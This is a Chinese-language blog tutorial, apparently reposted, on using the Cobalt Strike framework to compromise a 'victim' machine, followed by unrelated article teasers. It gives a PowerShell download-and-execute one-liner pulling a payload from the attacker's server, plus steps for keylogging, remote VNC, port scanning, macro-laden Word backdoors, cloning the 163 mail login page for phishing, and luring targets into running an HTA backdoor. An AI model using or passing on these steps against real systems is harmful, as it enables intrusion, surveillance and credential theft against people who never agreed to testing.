Cobalt Strike工具基本使用

Cobalt Strike

  • 安装
  • 启动
        • 启动server端
        • 启动client
        • 目标机器连接
  • 工具基使用
      • 用户驱动攻击
        • 屏幕截图
        • 进程列表
        • 键盘记录
        • 文件管理
        • 远程vnc
        • 远程代理
        • 端口扫描
    • 生成后门
        • 被攻击者运行后门文件后查看结果
    • 钓鱼攻击
        • 信息收集
        • 网站克隆
        • 文件下载

安装

网盘地址:链接:https://pan.baidu.com/s/1GgKaueOjXUz_LPw34GjUWQ
提取码:0dqp

启动

启动server端

sudo ./teamserver 192.168.0.107 123456  # ip + 密码

在这里插入图片描述

启动client

在这里插入图片描述

目标机器连接

  1. 创建监听器
    在这里插入图片描述
    在这里插入图片描述

在这里插入图片描述

复制内容
powershell.exe -nop -w hidden -c “IEX ((new-object net.webclient).downloadstring(‘http://192.168.0.107:8080/a’))”

  1. 受害机执行利用语句

在这里插入图片描述

在这里插入图片描述

工具基使用

用户驱动攻击

屏幕截图

在这里插入图片描述

在这里插入图片描述

进程列表

在这里插入图片描述

键盘记录

  1. 选中需要监听应用后点击log keystrokes
    在这里插入图片描述

  2. 被攻击电脑操作键盘
    在这里插入图片描述

  3. 结束任务

jobs       #查看已有任务
jobkill  id值   #结束某任务

在这里插入图片描述

文件管理

在这里插入图片描述
在这里插入图片描述

远程vnc

查看用户操作页面
在这里插入图片描述

远程代理

在这里插入图片描述
在这里插入图片描述
》》然后本机的浏览器代理可以设置为上面的代理地址,我这没ie浏览器就不进行展示

端口扫描

方法一:使用页面功能直接扫描
在这里插入图片描述
方法二:命令行输入

portscan 192.168.0.109 1-1024,3389,5000-6000 arp 1024

在这里插入图片描述
扫描结果查看
在这里插入图片描述
查看服务情况
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

生成后门

方法一:
在这里插入图片描述
在这里插入图片描述

方法二:
在这里插入图片描述

在这里插入图片描述
wps方式:

新建word文件,开发工具中点击js宏,指定宏名称和宏位置
删除以有内容,复制生成的宏内容到word文件中
另存为带宏的文件
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
》》没办法运行就不展示运行结果了

方法三:
在这里插入图片描述

被攻击者运行后门文件后查看结果

在这里插入图片描述

钓鱼攻击

信息收集

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

被攻击者浏览器运行生成的地址

http://192.168.0.107:80/baidu

在这里插入图片描述
》》不知道什么原因应用信息并没有查询到

网站克隆

已163邮箱为例子

在这里插入图片描述
在这里插入图片描述

文件下载

思路:
让被攻击者访问我们克隆的网站时,诱导目标下载后门文件并运行

  1. 生成后门文件地址
http://192.168.0.107:80/test.hta

在这里插入图片描述
2. 克隆网站

在这里插入图片描述
3. 目标网站浏览器运行地址并下载运行后门文件

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/23805.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

PyG的Planetoid无法直接下载Cora等数据集的解决方法

问题描述: 在使用PyG的时候,通常会涉及到一些公共数据集的下载,由于网络问题,导致无法下载出现以下问题: 尝试了很多的方法都没有成功(主要是个人比较菜!)。但是皇天不负有心人&am…

文心一言和ChatGPT最全对比

文心一言和ChatGPT都是基于深度学习技术的自然语言处理模型,有各自的优势和使用场景,无法简单地比较 ChatGPT 和文心一言哪一个功能更强大,它们各自具有优势和局限性,需要根据具体需求进行选择,以下一些具体对比&#…

分布式网络通信框架(十)——Mprpc框架使用示例

发布一个服务提供远程调用方法的流程 若想要发布一个服务提供一些远程调用方法,步骤如下: 先在protobuf文件中添加参数和返回值的message 类型,然后再添加希望提供的服务 service 类型(如UserServiceRpc)和 其中的方…

C++内存管理和模板

文章目录 内存管理new和delete 函数模板隐式实例化显式实例化 类模板 内存管理 有时候我们需要动态的申请内存,比如队列,栈,二叉树等数据结构,我们一开始并不知道要存储多少个数据,也就是不确定究竟要多大的内存,给小了存不下,给大了会造成内存资源的浪费,因此动态的申请内存是…

原工程运行正常,重新复制一份后再 npm install 后再运行就报错的解决办法

原工程,运行正常 将刚刚的工程复制一份呢,重新 npm install 再 npm run serve 就报错 出现这个问题十之八九都是依赖的问题。有可能是因为这个工程里面之前安装过一些东西,后来莫名其妙的就把 package.json 里面相关的依赖给删掉了。但由于原…

【数据结构】顺序二叉树的实现—以堆的实现为例、堆的调整、堆的创建、堆的插入和删除、堆排序

文章目录 1.堆的概念及结构2.堆的实现(以大堆为例)2.1堆的插入2.1.1堆的向上调整算法 2.2堆的删除2.2.1堆的向下调整算法 2.3堆的创建2.4有关建堆的时间复杂度 3.堆排序4.C语言堆实现源码 1.堆的概念及结构 堆就是顺序结构二叉树。 如果有一个关键码的集…

jetcache参考文档

jetcache简介 https://github.com/alibaba/jetcache/blob/master/docs/CN/GettingStarted.md 简介 JetCache是一个基于Java的缓存系统封装,提供统一的API和注解来简化缓存的使用。 JetCache提供了比SpringCache更加强大的注解,可以原生的支持TTL、两级…

shell变量类型含义 长方形面积计算 截取相应字段方法

1.总结变量的类型及含义? 2.实现课堂案例计算长方形面积?(6种方式) 3.定义变量urlhttps://blog.csdn.net/weixin_45029822/article/details/103568815(通过多种方法实现) 1)截取网站访问的协议 …

文心一言 VS 讯飞星火 VS chatgpt (22)-- 算法导论4.2 2题

二、为Strassen算法编写伪代码。 文心一言: Strassen算法是一种用于矩阵乘法的算法,它的核心思想是通过不断将原始矩阵分割成较小的子矩阵来实现高效的乘法运算。以下是Strassen算法的伪代码: function Strassen(A, B): if A[0][0] 0 or…

Springboot整合WebSocket

目录 1.WebSocket 简介 2.WebSocket 实战 1.WebSocket 简介 WebSocket是一种在单个TCP连接上进行全双工通信的协议。WebSocket使得客户端和服务器之间的数据交换变得更加简单,允许服务端主动向客户端推送数据。在WebSocket API中,浏览器和服务器只需要…

基于html+css的图展示98

准备项目 项目开发工具 Visual Studio Code 1.44.2 版本: 1.44.2 提交: ff915844119ce9485abfe8aa9076ec76b5300ddd 日期: 2020-04-16T16:36:23.138Z Electron: 7.1.11 Chrome: 78.0.3904.130 Node.js: 12.8.1 V8: 7.8.279.23-electron.0 OS: Windows_NT x64 10.0.19044 项目…

C++入门

文章目录 😀1. 命名空间😄1.1 命名空间定义😄1.2 命名空间使用 😊2. 输入和输出😉3. 缺省参数🫠3.1 缺省参数概念🫠3.2 缺省参数分类 😬4. 函数重载🙄4.1 函数重载概念&a…

TypeScript9-声明文件

本篇文章来讲 TypeScript 的声明文件。 当我们在使用第三方库的时候,很多第三方库不是用 TS 写的,它们是通过原生的 JavaScript 或者是浏览器 / 或者是 node 提供的 run time 对象。如果我们直接使用 TS 肯定就会报编译不通过。 1. 声明语句 假设一个…

浅析变电站无人值守管理的模式与特点

安科瑞虞佳豪 近年来,随着电网的发展,变电站实行无人值班管理模式已成为电网的发展方向。自1998年始,辉县市就开始了变电站综合自动化改造,截止目前全局所属24座变电站(其中35kV19座、110kV5座)已全部实现…

API自动化测试【postman生成报告】

PostMan生成测试报告有两种: 1、控制台的模式 2、HTML的测试报告 使用到一个工具newman Node.js是前端的一个组件,主要可以使用它来开发异步的程序。 一、控制台的模式 1、安装node.js 双击node.js进行安装,安装成功后在控制台输入node …

Java集合基础

4 集合基础 集合提供一种存储空间可变的存储模型,存储的数据容量可以改变ArrayLis<>: 可调整大小的数组实现<>:是一种特殊的数据类型,泛型可储存重复元素怎么使用呢 在出现E的地方我们使用引用数据类型替换即可举例:ArrayList<String>、ArrayList<Stu…

财务共享时代企业数智化应用能帮我们做些什么?

随着企业规模的不断扩大和业务范围的逐步扩展&#xff0c;财务工作的难度和复杂度也在不断提高&#xff0c;传统的手工录入和处理方式呈现出流程长、效率低、易出错等问题。为了提升财务工作的效率和准确性&#xff0c;越来越多的企业开始利用数智化应用打造企业内部的财务数智…

绝对不能错过的7个零基础免费的ChatGPT镜像网站

还在为打不开openai官网烦心&#xff1f;本文帮你实现ChatGPTMidJourney自由(&#xffe3;∇&#xffe3;)/ &#x1f4d2;收集了一些截至目前(2023年5月25日午12:00)可以免费访问&#xff0c;并且零基础也能正常使用的镜像网站&#xff0c;后续将持续维护更新(&#xff61;&a…

平安银行广州分行立足地域文化,增强差异化权益服务软实力

立足地域文化&#xff0c;拓展差异化权益服务 瓦屋纸窗之下&#xff0c;一盏清茶&#xff0c;三五好友&#xff0c;怡然自若。中国人对茶的喜爱由来已久&#xff0c;茶文化已成为中华传统文化中一张亮丽的名片&#xff0c;而广东茶文化则是中国四大茶文化系列之一。平安银行广州…

抖音seo优化源代码搭建+抖音小程序私有化开源部署

抖音seo优化源码&#xff0c;抖音seo矩阵系统搭建&#xff0c;抖音账号矩阵系统开发&#xff0c;企业在做账号矩阵过程中&#xff0c;最头疼的莫过于私域线索转化&#xff0c;作为开发者都知道&#xff0c;目前市面上我们了解的矩阵系统除了挂载POI信息外&#xff0c;无法挂载留…